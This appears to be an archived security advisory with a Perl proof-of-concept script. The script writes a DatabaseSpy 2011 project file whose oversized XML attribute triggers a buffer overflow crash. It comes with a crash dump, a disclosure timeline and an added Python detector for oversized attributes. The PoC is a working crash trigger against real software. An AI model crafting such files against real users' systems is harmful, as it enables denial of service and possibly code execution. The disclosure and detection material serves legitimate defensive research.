
[dos / poc] - Altova DatabaseSpy 2011 Project File Handling Buffer Overflow Vulnerability

Posted on 21 October 2010

=============================================================
Altova DatabaseSpy 2011 Project File Handling Buffer Overflow
=============================================================

#!/usr/bin/perl
#
#
# Title: Altova DatabaseSpy 2011 Project File Handling Buffer Overflow Vulnerability
#
#
# Vendor: Altova GmbH
# Product web page: http://www.altova.com
# Affected version: Enterprise Edition 2011
#
#
# Summary: Altova DatabaseSpy® 2011 is the unique multi-database query, design,
# and database comparison tool. It connects to all major databases, easing SQL
# editing, database structure design, database content editing, database schema
# and content comparison, and database conversion for a fraction of the cost of
# single-database solutions.
#
#
# Desc: The Altova DatabaseSpy 2011 Enterprise Edition suffers from a buffer
# overflow/memory corruption vulnerability when handling project files (.qprj).
# The issue is triggered because there is no boundary checking of some XML tag
# property values, ex: <Folder FolderName="SQL" Type="AAAAAAA..../>" (~1000 bytes).
# This can aid the attacker to execute arbitrary machine code in the context of an
# affected node (locally and remotely) via file crafting or computer-based social
# engineering.
#
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
#
#----------------------------------------------------------------------------------#
#
# (342c.37c0): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=04430041 ebx=0203ff98 ecx=0443deda edx=56413f2e esi=0022dd98 edi=00000016
# eip=00420b83 esp=0022dc00 ebp=00000017 iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for
# DatabaseSpy.exe -
# DatabaseSpy+0x20b83:
# 00420b83 663b02          cmp     ax,word ptr [edx]        ds:0023:56413f2e=????
#
#----------------------------------------------------------------------------------#
#
#
# Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
#                              liquidworm gmail com
#                              Zero Science Lab - http://www.zeroscience.mk
#
#
# Vendor status: [17.10.2010] Vulnerability discovered.
#                [17.10.2010] Initial contact with the vendor with sent PoC files.
#                [21.10.2010] No reply from vendor.
#                [22.10.2010] Public advisory released.
#
#
# Advisory ID: ZSL-2010-4971
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4971.php
# Advisory TXT: http://www.zeroscience.mk/codes/dbspy_bof.txt
#
#
# 17.10.2010
#

use strict;

system("cls");

sub header()
{
print "
@=---===---===---===---===---===---===---===---=@
|                                               |
| Proof Of Concept PERL script for              |
|                                               |
| Altova DatabaseSpy 2011 (Enterprise Edition)  |
|                                               |
|                                               |
|                                               |
| ---                                           |
|                                               |
| Copyleft (c) 2010                             |
|                                               |
| Zero Science Lab - http://www.zeroscience.mk  |
|                                               |
@=---===---===---===---===---===---===---===---=@
";
}

my $FILENAME = "DEATH_FROM_ABOVE.qprj"; #DatabaseSpy Project File

my $PAYLOAD = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". #48
              "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
              "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
              "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
              "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
              "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
              "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
              "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
              "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
              "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
              "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
              "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
              "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
              "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
              "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
              "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
              "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
              "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
              "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
              "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
              "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; #1008B #21

# Project file body; the Design folder's Type attribute carries $PAYLOAD.
# \xA and \x9 are the newline and tab bytes of the original file layout.
my $PROJECT = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\xA<!-".
              "- DatabaseSpy Project File -->\xA<Project Vers".
              "ion=\"2\" Expanded=\"Yes\" Type=\"Root\" Title=".
              "\"test\">\xA\x9<Folder FolderName=\"Data Sources".
              "\" Type=\"DataSourceFolder\"/>\xA\x9<Folder Fol".
              "derName=\"SQL\" Type=\"SQLRootFolder\" database".
              "_kind=\"Unknown\" datasource=\"Offline\" descrip".
              "tion=\"Store and organize SQL files for this pro".
              "ject.\" blockingstrategy=\"semi\"/>\xA\x9<Folder".
              " FolderName=\"Design\" Type=\"$PAYLOAD\" databas".
              "e_kind=\"Unknown\" datasource=\"Offline\" descri".
              "ption=\"I LOVE VERONICA CORNINGSTONE.\"/>\xA\x9<".
              "Folder FolderName=\"Data Diff\" Type=\"DataDiffR".
              "ootFolder\"/>\xA\x9<Folder FolderName=\"Schema D".
              "iff\" Type=\"Schema DiffRootFolder\"/>\xA\x9<Fol".
              "der FolderName=\"Favorites\" Type=\"FavoriteFold".
              "er\"/>\xA</Project>\xA";

sub code()
{
system("color 3");
#~!@#$%^&*()_+|<>?:"{}=-`';/.,0
# "or die" instead of "|| die": "||" binds to the filename string, so the
# original form could never report a failed open.
open(qprj, ">./$FILENAME") or die "\n Can't open #$_@ $FILENAME: $!\n";
print "\n (1)\n";
system("pause");
#
print qprj $PROJECT;
print "\n (2) Buffering mali".
      "cious format file . . . \n";
sleep 2;
close qprj;
print "\n (3) File $FILENAME created successfully".
      "!\n";
sleep 2;
system("color x44");
sleep 1;
#.%
print "\n (4) And the color is changed.\n";
}

print "\n";
header();
code();
#EOF
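The advisory's root cause is an attribute value that the application copies without a length check. A defender who has to accept .qprj files from untrusted sources (a mail gateway, a file-share scanner, incident triage of a suspicious project file) can parse the file with a bounds-aware XML parser and report attribute values far longer than a real project ever needs, before the file reaches DatabaseSpy. The following is an added example, not the advisory's PoC and not Altova code: the element and attribute names follow the project file reproduced above, while `MAX_ATTR_LEN` and the benign `DesignRootFolder` value are assumptions made for the example.

```python
"""Flag .qprj project files whose XML attribute values are suspiciously long.

Added example for this advisory (not the advisory's PoC, not Altova code).
The advisory reports that DatabaseSpy 2011 does no bounds checking on some
attribute values of a .qprj file and faults on a Type attribute of about
1000 bytes. Python's expat-backed parser stores attribute values in
dynamically sized buffers, so it can read such a file safely and report the
oversized value instead of crashing on it.
"""
import xml.etree.ElementTree as ET
from xml.sax.saxutils import quoteattr

MAX_ATTR_LEN = 256  # assumption: legitimate FolderName/Type values are far shorter


def audit_qprj(data: bytes, max_len: int = MAX_ATTR_LEN) -> list:
    """Return (tag, attribute, byte_length) for every attribute value longer than max_len.

    A file that does not parse at all is reported as a single
    ("<parse-error>", message, 0) finding so that it is never treated as clean.
    """
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [("<parse-error>", str(exc), 0)]
    findings = []
    for elem in root.iter():  # root.iter() walks the root and every descendant
        for name, value in sorted(elem.attrib.items()):
            length = len(value.encode("utf-8"))
            if length > max_len:
                findings.append((elem.tag, name, length))
    return findings


def build_sample_qprj(design_type: str) -> bytes:
    """Construct a minimal project file in the layout shown in the advisory (constructed sample).

    design_type is substituted into the Type attribute of the "Design" folder,
    which is the attribute the advisory's PoC oversizes. quoteattr() escapes the
    value so the sample stays well-formed XML whatever is passed in.
    """
    folders = [
        ("Data Sources", "DataSourceFolder"),
        ("SQL", "SQLRootFolder"),
        ("Design", design_type),
        ("Data Diff", "DataDiffRootFolder"),
        ("Favorites", "FavoriteFolder"),
    ]
    body = "".join(
        "\t<Folder FolderName=%s Type=%s/>\n" % (quoteattr(n), quoteattr(t))
        for n, t in folders
    )
    doc = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!-- DatabaseSpy Project File -->\n"
        '<Project Version="2" Expanded="Yes" Type="Root" Title="test">\n'
        + body
        + "</Project>\n"
    )
    return doc.encode("utf-8")


if __name__ == "__main__":
    samples = (
        ("benign", build_sample_qprj("DesignRootFolder")),  # assumed benign value
        ("oversized", build_sample_qprj("A" * 1000)),       # the advisory's ~1000-byte case
        ("truncated", b'<Project Version="2"'),             # malformed file, constructed
    )
    for label, sample in samples:
        print(label, audit_qprj(sample))
```

The threshold is deliberately generous: the point is to catch values three or four times longer than any attribute in a genuine project file, not to model the exact size at which DatabaseSpy faults, which the advisory only gives as "~1000 bytes". Reporting the tag and attribute name lets an analyst go straight to the offending element when the file is examined by hand.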

